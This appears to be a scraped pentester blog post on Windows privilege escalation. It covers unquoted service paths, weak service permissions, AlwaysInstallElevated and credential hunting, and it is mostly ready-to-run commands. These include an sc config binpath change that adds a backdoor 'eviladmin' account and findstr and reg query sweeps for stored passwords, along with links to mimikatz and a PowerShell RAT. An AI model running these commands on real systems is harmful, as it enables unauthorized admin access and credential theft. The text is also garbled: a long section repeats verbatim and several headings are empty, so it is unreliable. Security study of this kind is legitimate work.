Windows Privilege Escalation Methods
Read More
Unquoted Service Paths
To identify these unquoted services you can run this command on Windows Command Shell:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
If you look at the registry entry for this service with Regedit you can see the ImagePath value is:
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
It should be like this:
"C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe"
When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find:
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Program.exe
C:\Program Files (x86)\Program Folder\A.exe
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
In order to check the permissions of a folder, we can use built-in Windows tool, icals. Let’s check permissions for C:\Program Files (x86)\Program Folder folder:
C:\Program Files (x86)\Program Folder>icacls "C:\Program Files (x86)\Program Folder"
C:\Program Files (x86)\Program Folder Everyone:(OI)(CI)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
Successfully processed 1 files; Failed processing 0 files
C:\Program Files (x86)\Program Folder>
F = Full Control
CI = Container Inherit – This flag indicates that subordinate containers will inherit this ACE.
OI = Object Inherit – This flag indicates that subordinate files will inherit the ACE.
There is a Metasploit module for checking and exploiting this vulnerability: exploit/windows/local/trusted_service_path https://www.rapid7.com/db/modules/exploit/windows/local/trusted_service_path
Services with Vulnerable Privileges
Windows services run as SYSTEM. So, their folders, files, and registry keys must be protected with strong access controls. In some cases, we encounter services that are not sufficiently protected.
Insecure Registry Permissions
In Windows, information related to services is stored in HKLM\SYSTEM\CurrentControlSet\Services registry key. If we want to see information about our “Vulnerable Service” we should check HKLM\SYSTEM\ControlSet001\Services\Vulnerable Service key.
To check which Services have vulnerable privileges we can use AccessChk tool from SysInternals Suite.
C:\Users\testuser\AppData\Local\Temp>accesschk.exe -uwcqv "testuser" *
accesschk.exe -uwcqv "TestUser" *
Let’s view the properties of the Vulnerable Service:
C:\Users\testuser\AppData\Local\Temp>sc qc "Vulnerable Service"
sc qc "Vulnerable Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Vulnerable Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
LOAD_ORDER_GROUP : UIGroup
TAG : 0
DISPLAY_NAME : Vulnerable Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\testuser\AppData\Local\Temp>
C:\Users\testuser\AppData\Local\Temp>sc config "Vulnerable Service" binpath= "net user eviladmin P4ssw0rd@ /add"
sc config "Vulnerable Service" binpath= "net user eviladmin P4ssw0rd@ /add"
[SC] ChangeServiceConfig SUCCESS
Instead of manually applying this method you can use this metasploit module: exploit/windows/local/service_permissions
Insecure File/Folder Permissions
AlwaysInstallElevated
You should check this registry values to understand if this policy is enabled:
[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer]
“AlwaysInstallElevated”=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
“AlwaysInstallElevated”=dword:00000001
Instead of manually applying this technique you can use this Metasploit module: exploit/windows/local/always_install_elevated
Privilege Escalation with Task Scheduler
DLL Hijacking
Stored Credentials
If none of that methods work, you may need to try finding some stored credentials to escalate your privileges. You may want to check these directories:
C:\unattend.xml
C:\sysprep.inf
C:\sysprep\sysprep.xml
And you may want to search files using queries like this:
dir c:\*vnc.ini /s /b /c
dir c:\*ultravnc.ini /s /b /c
dir c:\ /s /b /c | findstr /si *vnc.ini
findstr /si password *.txt | *.xml | *.ini
findstr /si pass *.txt | *.xml | *.ini
use post/windows/gather/enum_unattend
Windows Files
It is very common for administrators to use Windows Deployment Services in order to create an image of a Windows operating system and deploy this image in various systems through the network. This is called unattended installation. The problem with unattended installations is that the local administrator password is stored in various locations either in plaintext or as Base-64 encoded. These locations are:
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
There is a Metasploit module which can discover credentials via unattended installations:
post/windows/gather/enum_unattend
If the system is running an IIS web server the web.config file should be checked as it might contain the administrator password in plaintext. The location of this file is usually in the following directories:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
A sample of a web.config file with the administrator credentials can be seen below:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<authentication mode="Windows">
<forms>
<credentials passwordFormat="Clear">
<user name="Admin" password="Admin" />
</credentials>
</forms>
</authentication>
</system.web>
</configuration>
Local administrators passwords can also retrieved via the Group Policy Preferences. The Groups.xml file which contains the password is cached locally or it can be obtained from the domain controller as every domain user has read access to this file. The password is in an encrypted form but Microsoft has published the key and it can be decrypted.
C:\ProgramData\Microsoft\Group Policy\History\????\Machine\Preferences\Groups\Groups.xml
\\????\SYSVOL\\Policies\????\MACHINE\Preferences\Groups\Groups.xml
Except of the Group.xml file the cpassword attribute can be found in other policy preference files as well such as:
Services\Services.xml
ScheduledTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml
Commands
Instead of manually browsing all the files in the system it is also possible to run the following command in order to discover files that contain the word password:
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
Alternatively the following commands from the C: drive will return the location of the files that elevated credentials might be stored:
C:\> dir /b /s unattend.xml
C:\> dir /b /s web.config
C:\> dir /b /s sysprep.inf
C:\> dir /b /s sysprep.xml
C:\> dir /b /s *pass*
C:\> dir /b /s vnc.ini
Third Party Software
McAfee
Most Windows systems they are running McAfee as their endpoint protection. The password is stored encrypted in the SiteList.xml file:
%AllUsersProfile%Application Data\McAfee\Common Framework\SiteList.xml
VNC
Administrators some times tend to use VNC software instead of Windows Terminal Services for remote administration of the system. The password is encrypted but there are various tools that can decrypt it.
UltraVNC
[ultravnc]
passwd=5FAEBBD0EF0A2413
RealVNC
In RealVNC the hashed password is located in the following registry key:
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
Putty
Putty clear text proxy credentials can be found in the following directory:
reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"
Registry
Registry can be queried as in some occasions might contain credentials.
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Windows Autologin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
SNMP Parameters:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
PowerSploit
PowerSploit can be used as a tool for the discovery of stored credentials. Specifically it supports the following modules which will check for credentials encrypted or plain-text in various files and in the registry:
Get-UnattendedInstallFile
Get-Webconfig
Get-ApplicationHost
Get-SiteListPassword
Get-CachedGPPPassword
Get-RegistryAutoLogon
Windows Files
It is very common for administrators to use Windows Deployment Services in order to create an image of a Windows operating system and deploy this image in various systems through the network. This is called unattended installation. The problem with unattended installations is that the local administrator password is stored in various locations either in plaintext or as Base-64 encoded. These locations are:
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
There is a Metasploit module which can discover credentials via unattended installations:
post/windows/gather/enum_unattend
If the system is running an IIS web server the web.config file should be checked as it might contain the administrator password in plaintext. The location of this file is usually in the following directories:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
A sample of a web.config file with the administrator credentials can be seen below:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<authentication mode="Windows">
<forms>
<credentials passwordFormat="Clear">
<user name="Admin" password="Admin" />
</credentials>
</forms>
</authentication>
</system.web>
</configuration>
Local administrators passwords can also retrieved via the Group Policy Preferences. The Groups.xml file which contains the password is cached locally or it can be obtained from the domain controller as every domain user has read access to this file. The password is in an encrypted form but Microsoft has published the key and it can be decrypted.
C:\ProgramData\Microsoft\Group Policy\History\????\Machine\Preferences\Groups\Groups.xml
\\????\SYSVOL\\Policies\????\MACHINE\Preferences\Groups\Groups.xml
Except of the Group.xml file the cpassword attribute can be found in other policy preference files as well such as:
Services\Services.xml
ScheduledTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml
Commands
Instead of manually browsing all the files in the system it is also possible to run the following command in order to discover files that contain the word password:
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
Alternatively the following commands from the C: drive will return the location of the files that elevated credentials might be stored:
C:\> dir /b /s unattend.xml
C:\> dir /b /s web.config
C:\> dir /b /s sysprep.inf
C:\> dir /b /s sysprep.xml
C:\> dir /b /s *pass*
C:\> dir /b /s vnc.ini
Third Party Software
McAfee
Most Windows systems they are running McAfee as their endpoint protection. The password is stored encrypted in the SiteList.xml file:
%AllUsersProfile%Application Data\McAfee\Common Framework\SiteList.xml
VNC
Administrators some times tend to use VNC software instead of Windows Terminal Services for remote administration of the system. The password is encrypted but there are various tools that can decrypt it.
UltraVNC
[ultravnc]
passwd=5FAEBBD0EF0A2413
RealVNC
In RealVNC the hashed password is located in the following registry key:
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
Putty
Putty clear text proxy credentials can be found in the following directory:
reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"
Registry
Registry can be queried as in some occasions might contain credentials.
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Windows Autologin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
SNMP Parameters:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
PowerSploit
PowerSploit can be used as a tool for the discovery of stored credentials. Specifically it supports the following modules which will check for credentials encrypted or plain-text in various files and in the registry:
Get-UnattendedInstallFile
Get-Webconfig
Get-ApplicationHost
Get-SiteListPassword
Get-CachedGPPPassword
Get-RegistryAutoLogon
Kernel Exploits
In this blog post, I intentionally tried to explain escalation methods that do not rely upon kernel exploits. But if you are about to use an exploit to escalate your privileges, maybe this command will help you to choose which one you should use:
wmic qfe get Caption,Description,HotFixID,InstalledOn
It will list the updates that are installed on the machine.
https://github.com/fireeye/SessionGopher
https://github.com/foxglovesec/Potato
https://github.com/Kevin-Robertson/Tater
https://github.com/HarmJ0y/PowerUp
https://github.com/PowerShellMafia/PowerSploit
https://github.com/putterpanda/mimikittenz
https://github.com/gentilkiwi/mimikatz
https://github.com/Mr-Un1k0d3r/PowerLessShell
https://github.com/Mr-Un1k0d3r/RC4-PowerShell-RAT
https://github.com/putterpanda/mimikittenz
https://github.com/gentilkiwi/mimikatz
https://github.com/Mr-Un1k0d3r/PowerLessShell
https://github.com/Mr-Un1k0d3r/RC4-PowerShell-RAT
[1] – https://www.trustwave.com/Resources/SpiderLabs-Blog/My-5-Top-Ways-to-Escalate-Privileges/
[2] – https://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx
[3] – https://msdn.microsoft.com/en-us/library/windows/desktop/ms682586(v=vs.85).aspx
[4] – https://www.synack.com/2014/12/10/dll-hijacking-in-2014/
[5] – http://www.fuzzysecurity.com/tutorials/16.html
[6] – https://www.exploit-db.com/docs/39732.pdf
[7] – https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/
[8] – https://toshellandback.com/2015/11/24/ms-priv-esc/
[9] – https://it-ovid.blogspot.de/2012/02/windows-privilege-escalation.html
[10] – https://blog.netspi.com/windows-privilege-escalation-part-1-local-administrator-privileges/
[11] – https://msitpros.com/?p=2012
[12] – https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
